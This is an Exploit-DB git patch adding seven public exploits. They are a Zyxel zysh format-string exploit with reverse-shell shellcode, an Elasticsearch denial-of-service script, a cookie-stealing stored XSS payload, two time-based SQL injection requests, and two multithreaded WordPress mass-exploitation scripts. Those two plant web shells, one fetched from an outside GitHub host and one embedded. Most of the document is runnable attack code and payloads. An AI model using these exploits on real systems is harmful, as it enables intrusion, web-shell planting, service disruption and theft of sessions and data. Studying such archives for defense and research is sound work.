From a846c2fd3a2f9e540171966f2cbf620457eb9ad9 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Sat, 10 Feb 2024 00:16:32 +0000
Subject: [PATCH] DB: 2024-02-10
8 changes to exploits/shellcodes/ghdb
Zyxel zysh - Format string
Elasticsearch - StackOverflow DoS
Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site Scripting (XSS) (Authenticated)
Online Nurse Hiring System 1.0 - Time-Based SQL Injection
Rail Pass Management System 1.0 - Time-Based SQL Injection
Wordpress Augmented-Reality - Remote Code Execution Unauthenticated
Wordpress Seotheme - Remote Code Execution Unauthenticated
---
exploits/hardware/remote/51786.txt | 207 +++++++++++++++++++++++++++++
exploits/multiple/dos/51787.txt | 54 ++++++++
exploits/php/webapps/51785.txt | 52 ++++++++
exploits/php/webapps/51788.py | 92 +++++++++++++
exploits/php/webapps/51789.py | 85 ++++++++++++
exploits/php/webapps/51790.txt | 29 ++++
exploits/php/webapps/51791.txt | 28 ++++
files_exploits.csv | 7 +
8 files changed, 554 insertions(+)
create mode 100644 exploits/hardware/remote/51786.txt
create mode 100644 exploits/multiple/dos/51787.txt
create mode 100644 exploits/php/webapps/51785.txt
create mode 100755 exploits/php/webapps/51788.py
create mode 100755 exploits/php/webapps/51789.py
create mode 100644 exploits/php/webapps/51790.txt
create mode 100644 exploits/php/webapps/51791.txt
diff --git a/exploits/hardware/remote/51786.txt b/exploits/hardware/remote/51786.txt
new file mode 100644
index 000000000..1516cefc8
--- /dev/null
+++ b/exploits/hardware/remote/51786.txt
@@ -0,0 +1,207 @@
+#!/usr/bin/expect -f
+
+#
+# raptor_zysh_fhtagn.exp - zysh format string PoC exploit
+# Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# "We live on a placid island of ignorance in the midst of black seas of
+# infinity, and it was not meant that we should voyage far."
+# -- H. P. Lovecraft, The Call of Cthulhu
+#
+# "Multiple improper input validation flaws were identified in some CLI
+# commands of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71,
+# USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware
+# versions 4.32 through 5.21, VPN series firmware versions 4.30 through
+# 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500
+# firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware
+# version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version
+# 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2)
+# and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and
+# earlier versions, that could allow a local authenticated attacker to
+# cause a buffer overflow or a system crash via a crafted payload."
+# -- CVE-2022-26531
+#
+# The zysh binary is a restricted shell that implements the command-line
+# interface (CLI) on multiple Zyxel products. This proof-of-concept exploit
+# demonstrates how to leverage the format string bugs I have identified in
+# the "extension" argument of some zysh commands, to execute arbitrary code
+# and escape the restricted shell environment.
+#
+# - This exploit targets the "ping" zysh command.
+# - It overwrites the .got entry of fork() with the shellcode address.
+# - The shellcode address is calculated based on a leaked stack address.
+# - Hardcoded offsets and values might need some tweaking, see comments.
+# - Automation/weaponization for other targets is left as an exercise.
+#
+# For additional details on my bug hunting journey and on the
+# vulnerabilities themselves, you can refer to the official advisory:
+# https://github.com/0xdea/advisories/blob/master/HNS-2022-02-zyxel-zysh.txt
+#
+# Usage:
+# raptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp <REDACTED> admin password
+# raptor_zysh_fhtagn.exp - zysh format string PoC exploit
+# Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# Leaked stack address: 0x7fe97170
+# Shellcode address: 0x7fe9de40
+# Base string length: 46
+# Hostile format string: %.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn
+#
+# *** enjoy your shell! ***
+#
+# sh-5.1$ uname -snrmp
+# Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0
+# sh-5.1$ id
+# uid=10007(admin) gid=10000(operator) groups=10000(operator)
+#
+# Tested on:
+# Zyxel USG20-VPN with Firmware 5.10
+# [other appliances/versions are also likely vulnerable]
+#
+
+# change string encoding to 8-bit ASCII to avoid annoying conversion to UTF-8
+encoding system iso8859-1
+
+# hostile format string to leak stack address via direct parameter access
+set offset1 77
+set leak [format "AAAA.0x%%%d\$x" $offset1]
+
+# offsets to reach addresses in retloc sled via direct parameter access
+set offset2 1801
+set offset3 [expr $offset2 + 1]
+
+# difference between leaked stack address and shellcode address
+set diff 27856
+
+# retloc sled
+# $ mips64-linux-readelf -a zysh | grep JUMP | grep fork
+# 112dd558 0000967f R_MIPS_JUMP_SLOT 00000000 fork@GLIBC_2.0
+# ^^^^^^^^ << this is the address we need to encode: [112dd558][112dd558][112dd558+2][112dd558+2]
+set retloc [string repeat "\x11\x2d\xd5\x58\x11\x2d\xd5\x58\x11\x2d\xd5\x5a\x11\x2d\xd5\x5a" 1024]
+
+# nop sled
+# nop-equivalent instruction: xor $t0, $t0, $t0
+set nops [string repeat "\x01\x8c\x60\x26" 64]
+
+# shellcode
+# https://github.com/0xdea/shellcode/blob/main/MIPS/mips_n32_msb_linux_revsh.c
+set sc "\x3c\x0c\x2f\x62\x25\x8c\x69\x6e\xaf\xac\xff\xec\x3c\x0c\x2f\x73\x25\x8c\x68\x68\xaf\xac\xff\xf0\xa3\xa0\xff\xf3\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x28\x06\xff\xff\x24\x02\x17\xa9\x01\x01\x01\x0c"
+
+# padding to align payload in memory (might need adjusting)
+set padding "AAA"
+
+# print header
+send_user "raptor_zysh_fhtagn.exp - zysh format string PoC exploit\n"
+send_user "Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>\n\n"
+
+# check command line
+if { [llength $argv] != 3} {
+ send_error "usage: ./raptor_zysh_fhtagn.exp <host> <user> <pass>\n"
+ exit 1
+}
+
+# get SSH connection parameters
+set port "22"
+set host [lindex $argv 0]
+set user [lindex $argv 1]
+set pass [lindex $argv 2]
+
+# inject payload via the TERM environment variable
+set env(TERM) $retloc$nops$sc$padding
+
+# connect to target via SSH
+log_user 0
+spawn -noecho ssh -q -o StrictHostKeyChecking=no -p $port $host -l $user
+expect {
+ -nocase "password*" {
+ send "$pass\r"
+ }
+ default {
+ send_error "error: could not connect to ssh\n"
+ exit 1
+ }
+}
+
+# leak stack address
+expect {
+ "Router? $" {
+ send "ping 127.0.0.1 extension $leak\r"
+ }
+ default {
+ send_error "error: could not access zysh prompt\n"
+ exit 1
+ }
+}
+expect {
+ -re "ping: unknown host AAAA\.(0x.*)\r\n" {
+ }
+ default {
+ send_error "error: could not leak stack address\n"
+ exit 1
+ }
+}
+set leaked $expect_out(1,string)
+send_user "Leaked stack address:\t$leaked\n"
+
+# calculate shellcode address
+set retval [expr $leaked + $diff]
+set retval [format 0x%x $retval]
+send_user "Shellcode address:\t$retval\n"
+
+# extract each byte of shellcode address
+set b1 [expr ($retval & 0xff000000) >> 24]
+set b2 [expr ($retval & 0x00ff0000) >> 16]
+set b3 [expr ($retval & 0x0000ff00) >> 8]
+set b4 [expr ($retval & 0x000000ff)]
+set b1 [format 0x%x $b1]
+set b2 [format 0x%x $b2]
+set b3 [format 0x%x $b3]
+set b4 [format 0x%x $b4]
+
+# calculate numeric arguments for the hostile format string
+set base [string length "/bin/zysudo.suid /bin/ping 127.0.0.1 -n -c 3 "]
+send_user "Base string length:\t$base\n"
+set n1 [expr ($b4 - $base) % 0x100]
+set n2 [expr ($b2 - $b4) % 0x100]
+set n3 [expr ($b1 - $b2) % 0x100]
+set n4 [expr ($b3 - $b1) % 0x100]
+
+# check for dangerous numeric arguments below 10
+if {$n1 < 10} { incr n1 0x100 }
+if {$n2 < 10} { incr n2 0x100 }
+if {$n3 < 10} { incr n3 0x100 }
+if {$n4 < 10} { incr n4 0x100 }
+
+# craft the hostile format string
+set exploit [format "%%.%du%%$offset2\$n%%.%du%%$offset2\$hn%%.%du%%$offset2\$hhn%%.%du%%$offset3\$hhn" $n1 $n2 $n3 $n4]
+send_user "Hostile format string:\t$exploit\n\n"
+
+# uncomment to debug
+# interact +
+
+# exploit target
+set prompt "(#|\\\$) $"
+expect {
+ "Router? $" {
+ send "ping 127.0.0.1 extension $exploit\r"
+ }
+ default {
+ send_error "error: could not access zysh prompt\n"
+ exit 1
+ }
+}
+expect {
+ "Router? $" {
+ send_error "error: could not exploit target\n"
+ exit 1
+ }
+ -re $prompt {
+ send_user "*** enjoy your shell! ***\n"
+ send "\r"
+ interact
+ }
+ default {
+ send_error "error: could not exploit target\n"
+ exit 1
+ }
+}
\ No newline at end of file
diff --git a/exploits/multiple/dos/51787.txt b/exploits/multiple/dos/51787.txt
new file mode 100644
index 000000000..88bf365ab
--- /dev/null
+++ b/exploits/multiple/dos/51787.txt
@@ -0,0 +1,54 @@
+# Exploit Author: TOUHAMI KASBAOUI
+# Vendor Homepage: https://elastic.co/
+# Version: 8.5.3 / OpenSearch
+# Tested on: Ubuntu 20.04 LTS
+# CVE : CVE-2023-31419
+# Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419
+
+import requests
+import random
+import string
+
+es_url = 'http://localhost:9200' # Replace with your Elasticsearch server URL
+index_name = '*'
+
+payload = "/*" * 10000 + "\\" +"'" * 999
+
+verify_ssl = False
+
+username = 'elastic'
+password = 'changeme'
+
+auth = (username, password)
+
+num_queries = 100
+
+for _ in range(num_queries):
+ symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
+ search_query = {
+ "query": {
+ "match": {
+ "message": (symbols * 9000) + payload
+ }
+ }
+ }
+
+ print(f"Query {_ + 1} - Search Query:")
+
+ search_endpoint = f'{es_url}/{index_name}/_search'
+ response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)
+
+ if response.status_code == 200:
+ search_results = response.json()
+
+ print(f"Query {_ + 1} - Response:")
+ print(search_results)
+
+ total_hits = search_results['hits']['total']['value']
+ print(f"Query {_ + 1}: Total hits: {total_hits}")
+
+ for hit in search_results['hits']['hits']:
+ source_data = hit['_source']
+ print("Payload result: {search_results}")
+ else:
+ print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")
\ No newline at end of file
diff --git a/exploits/php/webapps/51785.txt b/exploits/php/webapps/51785.txt
new file mode 100644
index 000000000..c452fe3eb
--- /dev/null
+++ b/exploits/php/webapps/51785.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site
+Scripting (XSS) (Authenticated)
+# Date: 11.10.2023
+# Exploit Author: Furkan ÖZER
+# Software Link: https://wordpress.org/plugins/advanced-page-visit-counter/
+# Version: 8.0.5
+# Tested on: Kali-Linux,Windows10,Windows 11
+# CVE: N/A
+
+
+# Description:
+Advanced Page Visit Counter is a remarkable Google Analytics alternative
+specifically designed for WordPress websites, and it has quickly become a
+must-have plugin for website owners and administrators seeking powerful
+tracking and analytical capabilities. With the recent addition of Enhanced
+eCommerce Tracking for WooCommerce, this plugin has become even more
+indispensable for online store owners.
+
+Homepage | Support | Premium Version
+
+If you’re in search of a GDPR-friendly website analytics plugin exclusively
+designed for WordPress, look no further than Advanced Page Visit Counter.
+This exceptional plugin offers a compelling alternative to Google Analytics
+and is definitely worth a try for those seeking enhanced data privacy
+compliance.
+
+This is a free plugin and doesn’t require you to create an account on
+another site. All features outlined below are included in the free plugin.
+
+Description of the owner of the plugin Stored Cross-Site Scripting attack
+against the administrators or the other authenticated users.
+
+The plugin does not sanitise and escape some of its settings, which could
+allow high privilege users such as admin to perform Stored Cross-Site
+Scripting attacks even when the unfiltered_html capability is disallowed
+(for example in multisite setup)
+
+The details of the discovery are given below.
+
+# Steps To Reproduce:
+1. Install and activate the Advanced Page Visit Counter plugin.
+2. Visit the "Settings" interface available in settings page of the plugin
+that is named "Widget Settings"
+3. In the plugin's "Today's Count Label" setting field, enter the payload
+Payload: " "type=image src=1 onerror=alert(document.cookie)> "
+6. Click the "Save Changes" button.
+7. The XSS will be triggered on the settings page when every visit of an
+authenticated user.
+
+
+# Video Link
+https://youtu.be/zcfciGZLriM
\ No newline at end of file
diff --git a/exploits/php/webapps/51788.py b/exploits/php/webapps/51788.py
new file mode 100755
index 000000000..4bac40c05
--- /dev/null
+++ b/exploits/php/webapps/51788.py
@@ -0,0 +1,92 @@
+# Exploit Title: Wordpress Augmented-Reality - Remote Code Execution Unauthenticated
+# Date: 2023-09-20
+# Author: Milad Karimi (Ex3ptionaL)
+# Category : webapps
+# Tested on: windows 10 , firefox
+
+import requests as req
+import json
+import sys
+import random
+import uuid
+import urllib.parse
+import urllib3
+from multiprocessing.dummy import Pool as ThreadPool
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+filename="{}.php".format(str(uuid.uuid4())[:8])
+proxies = {}
+#proxies = {
+# 'http': 'http://127.0.0.1:8080',
+# 'https': 'http://127.0.0.1:8080',
+#}
+phash = "l1_Lw"
+r=req.Session()
+user_agent={
+"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
+}
+r.headers.update(user_agent)
+def is_json(myjson):
+ try:
+ json_object = json.loads(myjson)
+ except ValueError as e:
+ return False
+ return True
+def mkfile(target):
+ data={"cmd" : "mkfile", "target":phash, "name":filename}
+ resp=r.post(target, data=data)
+ respon = resp.text
+ if resp.status_code == 200 and is_json(respon):
+ resp_json=respon.replace(r"\/", "").replace("\\", "")
+ resp_json=json.loads(resp_json)
+ return resp_json["added"][0]["hash"]
+ else:
+ return False
+def put(target, hash):
+ content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False)
+ content=content.text
+ data={"cmd" : "put", "target":hash, "content": content}
+ respon=r.post(target, data=data, proxies=proxies, verify=False)
+ if respon.status_code == 200:
+ return True
+def exploit(target):
+ try:
+ vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target)
+ respon=r.get(vuln_path, proxies=proxies, verify=False).status_code
+ if respon != 200:
+ print("[FAIL] {}".format(target))
+ return
+ hash=mkfile(vuln_path)
+ if hash == False:
+ print("[FAIL] {}".format(target))
+ return
+ if put(vuln_path, hash):
+ shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename)
+ status = r.get(shell_path, proxies=proxies, verify=False).status_code
+ if status==200 :
+ with open("result.txt", "a") as newline:
+ newline.write("{}\n".format(shell_path))
+ newline.close()
+ print("[OK] {}".format(shell_path))
+ return
+ else:
+ print("[FAIL] {}".format(target))
+ return
+ else:
+ print("[FAIL] {}".format(target))
+ return
+ except req.exceptions.SSLError:
+ print("[FAIL] {}".format(target))
+ return
+ except req.exceptions.ConnectionError:
+ print("[FAIL] {}".format(target))
+ return
+def main():
+ threads = input("[?] Threads > ")
+ list_file = input("[?] List websites file > ")
+ print("[!] all result saved in result.txt")
+ with open(list_file, "r") as file:
+ lines = [line.rstrip() for line in file]
+ th = ThreadPool(int(threads))
+ th.map(exploit, lines)
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51789.py b/exploits/php/webapps/51789.py
new file mode 100755
index 000000000..c2f0c0c2c
--- /dev/null
+++ b/exploits/php/webapps/51789.py
@@ -0,0 +1,85 @@
+# Exploit Title: Wordpress Seotheme - Remote Code Execution Unauthenticated
+# Date: 2023-09-20
+# Author: Milad Karimi (Ex3ptionaL)
+# Category : webapps
+# Tested on: windows 10 , firefox
+
+import sys , requests, re
+from multiprocessing.dummy import Pool
+from colorama import Fore
+from colorama import init
+init(autoreset=True)
+
+fr = Fore.RED
+fc = Fore.CYAN
+fw = Fore.WHITE
+fg = Fore.GREEN
+fm = Fore.MAGENTA
+
+shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>"""
+requests.urllib3.disable_warnings()
+headers = {'Connection': 'keep-alive',
+ 'Cache-Control': 'max-age=0',
+ 'Upgrade-Insecure-Requests': '1',
+ 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
+ 'referer': 'www.google.com'}
+try:
+ target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
+except IndexError:
+ path = str(sys.argv[0]).split('\\')
+ exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
+
+def URLdomain(site):
+ if site.startswith("http://") :
+ site = site.replace("http://","")
+ elif site.startswith("https://") :
+ site = site.replace("https://","")
+ else :
+ pass
+ pattern = re.compile('(.*)/')
+ while re.findall(pattern,site):
+ sitez = re.findall(pattern,site)
+ site = sitez[0]
+ return site
+
+
+def FourHundredThree(url):
+ try:
+ url = 'http://' + URLdomain(url)
+ check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15)
+ if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
+ print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
+ open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
+ else:
+ url = 'https://' + URLdomain(url)
+ check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
+ if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
+ print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
+ open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
+ else:
+ print ' -| ' + url + ' --> {}[Failed]'.format(fr)
+ url = 'http://' + URLdomain(url)
+ check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15)
+ if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
+ print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
+ open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
+ else:
+ url = 'https://' + URLdomain(url)
+ check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
+ if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
+ print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
+ open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
+ else:
+ print ' -| ' + url + ' --> {}[Failed]'.format(fr)
+ except :
+ print ' -| ' + url + ' --> {}[Failed]'.format(fr)
+
+mp = Pool(100)
+mp.map(FourHundredThree, target)
+mp.close()
+mp.join()
+
+print '\n [!] {}Saved in Shells.txt'.format(fc)
\ No newline at end of file
diff --git a/exploits/php/webapps/51790.txt b/exploits/php/webapps/51790.txt
new file mode 100644
index 000000000..33ad6a913
--- /dev/null
+++ b/exploits/php/webapps/51790.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Rail Pass Management System - 'searchdata' Time-Based SQL Injection
+# Date: 02/10/2023
+# Exploit Author: Alperen Yozgat
+# Vendor Homepage: https://phpgurukul.com/rail-pass-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17479
+# Version: 1.0
+# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30
+
+## Description ##
+
+On the download-pass.php page, the searchdata parameter in the search function is vulnerable to SQL injection vulnerability.
+
+## Proof of Concept ##
+
+# After sending the payload, the response time will increase to at least 5 seconds.
+# Payload: 1'or+sleep(5)--+-
+
+POST /rpms/download-pass.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Cookie: PHPSESSID=6028f950766b973640e0ff64485f727b
+
+
+searchdata=1'or+sleep(5)--+-&search=
\ No newline at end of file
diff --git a/exploits/php/webapps/51791.txt b/exploits/php/webapps/51791.txt
new file mode 100644
index 000000000..3f5486afb
--- /dev/null
+++ b/exploits/php/webapps/51791.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Online Nurse Hiring System 1.0 - 'bookid' Time-Based SQL Injection
+# Date: 03/10/2023
+# Exploit Author: Alperen Yozgat
+# Vendor Homepage: https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql
+# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17826
+# Version: 1.0
+# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30
+
+## Description ##
+
+On the book-nurse.php page, the bookid parameter is vulnerable to SQL Injection vulnerability.
+
+## Proof of Concept ##
+
+# After sending the payload, the response time will increase to at least 5 seconds.
+# Payload: 1'+AND+(SELECT+2667+FROM+(SELECT(SLEEP(5)))RHGJ)+AND+'vljY'%3d'vljY
+
+POST /onhs/book-nurse.php?bookid=1'+AND+(SELECT+2667+FROM+(SELECT(SLEEP(5)))RHGJ)+AND+'vljY'%3d'vljY HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 140
+Cookie: PHPSESSID=0ab508c4aa5fdb6c55abb909e5cbce09
+
+contactname=test&contphonenum=1111111&contemail=test%40test.com&fromdate=2023-10-11&todate=2023-10-18&timeduration=1&patientdesc=3&submit=
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9e63b69a4..626b80bc6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -4006,6 +4006,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43105,exploits/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",remote,hardware,,2017-11-01,2017-11-01,0,CVE-2016-10401,,,,,
21186,exploits/hardware/remote/21186.txt,"ZYXEL Prestige 681 SDSL Router - IP Fragment Reassembly",2001-12-18,"Przemyslaw Frasunek",remote,hardware,,2001-12-18,2012-09-09,1,CVE-2001-1194;OSVDB-9979,,,,,https://www.securityfocus.com/bid/3711/info
50946,exploits/hardware/remote/50946.txt,"Zyxel USG FLEX 5.21 - OS Command Injection",2022-06-03,"Valentin Lobstein",remote,hardware,,2022-06-03,2022-06-03,0,CVE-2022-30525,,,,,
+51786,exploits/hardware/remote/51786.txt,"Zyxel zysh - Format string",2024-02-09,"Marco Ivaldi",remote,hardware,,2024-02-09,2024-02-09,0,,,,,,
23527,exploits/hardware/remote/23527.txt,"ZYXEL ZyWALL 10 Management Interface - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",remote,hardware,,2004-01-06,2012-12-20,1,CVE-2004-1789;OSVDB-3443,,,,,https://www.securityfocus.com/bid/9373/info
30485,exploits/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - '/Forms/General_1?sysSystemName' Cross-Site Scripting",2007-08-10,"Henri Lindberg",remote,hardware,,2007-08-10,2013-12-25,1,CVE-2007-4318;OSVDB-38721,,,,,https://www.securityfocus.com/bid/25262/info
5289,exploits/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution",2008-03-21,"Pranav Joshi",remote,hardware,,2008-03-20,2016-12-05,1,OSVDB-43700;CVE-2008-1160,,,,,
@@ -9538,6 +9539,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34248,exploits/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow",2010-07-05,"Pedro Andujar",dos,multiple,,2010-07-05,2014-08-03,1,,,,,,https://www.securityfocus.com/bid/41342/info
23390,exploits/multiple/dos/23390.txt,"EffectOffice Server 2.6 - Remote Service Buffer Overflow (PoC)",2003-11-20,D_BuG,dos,multiple,,2003-11-20,2012-12-14,1,OSVDB-2848,,,,,https://www.securityfocus.com/bid/9077/info
8695,exploits/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",dos,multiple,,2009-05-14,,1,OSVDB-54460;CVE-2009-1789,,,,,http://secunia.com/advisories/25276
+51787,exploits/multiple/dos/51787.txt,"Elasticsearch - StackOverflow DoS",2024-02-09,"TOUHAMI Kasbaoui",dos,multiple,,2024-02-09,2024-02-09,0,,,,,,
11763,exploits/multiple/dos/11763.pl,"Embedthis Appweb 3.1.2 - Remote Denial of Service",2010-03-15,chr1x,dos,multiple,,2010-03-14,,0,OSVDB-62969,,,,,
18601,exploits/multiple/dos/18601.txt,"EMC NetWorker 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",dos,multiple,,2012-03-14,2012-03-14,1,OSVDB-80590,,,,,
27420,exploits/multiple/dos/27420.c,"ENet - Multiple Denial of Service Vulnerabilities",2006-03-13,"Luigi Auriemma",dos,multiple,,2006-03-13,2013-08-07,1,CVE-2006-1194;OSVDB-23844,,,,,https://www.securityfocus.com/bid/17087/info
@@ -13583,6 +13585,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12038,exploits/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,webapps,php,,2010-04-03,,1,,,,,,
12031,exploits/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin",2010-04-03,alnjm33,webapps,php,,2010-04-02,,0,,,,,http://www.exploit-db.comam4ss.zip,
41521,exploits/php/webapps/41521.txt,"Advanced Matrimonial Script 2.0.3 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php,,2017-03-06,2017-03-06,0,,,,,,
+51785,exploits/php/webapps/51785.txt,"Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site Scripting (XSS) (Authenticated)",2024-02-09,"Furkan ÖZER",webapps,php,,2024-02-09,2024-02-09,0,,,,,,
33972,exploits/php/webapps/33972.txt,"Advanced Poll 2.0 - 'mysql_host' Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",webapps,php,,2010-05-10,2014-07-05,1,CVE-2010-2003;OSVDB-64524,,,,,https://www.securityfocus.com/bid/40045/info
22412,exploits/php/webapps/22412.txt,"Advanced Poll 2.0 - Remote Information Disclosure",2003-03-22,subj,webapps,php,,2003-03-22,2012-11-02,1,CVE-2003-1181;OSVDB-3292,,,,,https://www.securityfocus.com/bid/7171/info
28253,exploits/php/webapps/28253.txt,"Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion",2006-07-21,Solpot,webapps,php,,2006-07-21,2013-09-13,1,CVE-2003-1179;OSVDB-28988,,,,,https://www.securityfocus.com/bid/19105/info
@@ -24857,6 +24860,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49421,exploits/php/webapps/49421.txt,"Online Movie Streaming 1.0 - Admin Authentication Bypass",2021-01-14,"Richard Jones",webapps,php,,2021-01-14,2021-01-14,0,,,,,,
49688,exploits/php/webapps/49688.txt,"Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting",2021-03-19,"Richard Jones",webapps,php,,2021-03-19,2021-03-19,0,,,,,,
49687,exploits/php/webapps/49687.txt,"Online News Portal 1.0 - 'name' SQL Injection",2021-03-19,"Richard Jones",webapps,php,,2021-03-19,2021-03-19,0,,,,,,
+51791,exploits/php/webapps/51791.txt,"Online Nurse Hiring System 1.0 - Time-Based SQL Injection",2024-02-09,yozgatalperen1,webapps,php,,2024-02-09,2024-02-09,0,,,,,,
49615,exploits/php/webapps/49615.txt,"Online Ordering System 1.0 - Arbitrary File Upload",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-11-01,0,,,,,,
49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,webapps,php,,2009-04-15,,1,OSVDB-53775,,,,,
@@ -28614,6 +28618,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28048,exploits/php/webapps/28048.txt,"RahnemaCo - 'page.php' PageID Remote File Inclusion",2006-06-17,CrAzY.CrAcKeR,webapps,php,,2006-06-17,2013-09-03,1,CVE-2006-3314;OSVDB-27509,,,,,https://www.securityfocus.com/bid/18490/info
28025,exploits/php/webapps/28025.txt,"RahnemaCo - 'page.php' Remote File Inclusion",2006-06-14,Breeeeh,webapps,php,,2006-06-14,2013-09-02,1,CVE-2006-3315;OSVDB-27503,,,,,https://www.securityfocus.com/bid/18435/info
